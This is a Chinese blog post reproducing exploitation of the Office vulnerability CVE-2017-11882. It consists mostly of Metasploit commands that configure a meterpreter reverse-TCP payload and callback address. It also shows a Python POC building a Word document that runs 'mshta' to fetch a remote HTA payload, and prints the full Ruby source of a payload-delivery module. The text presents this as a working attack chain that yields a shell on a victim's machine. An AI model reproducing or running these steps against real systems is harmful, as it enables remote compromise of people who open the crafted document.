Office全版本漏洞CVE-2017-11882利用复现

漏洞分析
POC

在msf中使用模块生成hta文件

msf > use exploit/windows/office/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set PAYLOAD windows/meterpreter/reverse_tcp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf exploit(CVE-2017-11882) > show options

Module options (exploit/windows/office/CVE-2017-11882):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


这里可以设定生成的uri路径

msf exploit(CVE-2017-11882) > set URIPATH 1

设定回连ip和端口

msf exploit(CVE-2017-11882) > set LHOST x.x.x.x
msf exploit(CVE-2017-11882) > set LPORT 4455

执行exploit

1
2
3
4
5
6
7
8
9
10
11
msf exploit(CVE-2017-11882) > exploit
[*] Exploit running as background job 0.

[-] Handler failed to bind to 192.168.1.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Using URL: http://0.0.0.0:8080/1
[*] Local IP: http://192.168.114.128:8080/1
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.1:8080/1

如果受害者从url下载了文件会有提示

也可以把这个生成的文件放在外部的vps上,在设定ip的机器上监听回连shell也可以

随后使用POC生成doc文件

1
2
3
4
┌─[parrot@parrot]─[~/Desktop/CVE-2017-11882]
└──╼ $python '/home/aresx/Desktop/CVE-2017-11882/Command_CVE-2017-11882.py' -c "mshta http://192.168.114.128:8080/1" -o 'test.doc'
[*] Done ! output file >> test.doc <<

受害者打开doc文件,监听机便收到了会话

Metasploit模块CVE-2017-11882.rb

来源

保存到目录usr/share/metasploit-framework/modules/exploits/windows/office/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule  < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})
    super(update_info(info,
      'Name' => 'Microsoft Office Payload Delivery',
      'Description' => %q{
        This module generates an command to place within
        a word document, that when executed, will retrieve a HTA payload
        via HTTP from an web server. Currently have not figured out how
        to generate a doc.
      },
      'License' => MSF_LICENSE,
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'Targets' =>
        [
          ['Automatic', {} ],
        ],
      'DefaultTarget' => 0,
    ))
  end

  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win '}
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end


  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end

本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
Page View
2017-11-22
Contents
⬆︎TOP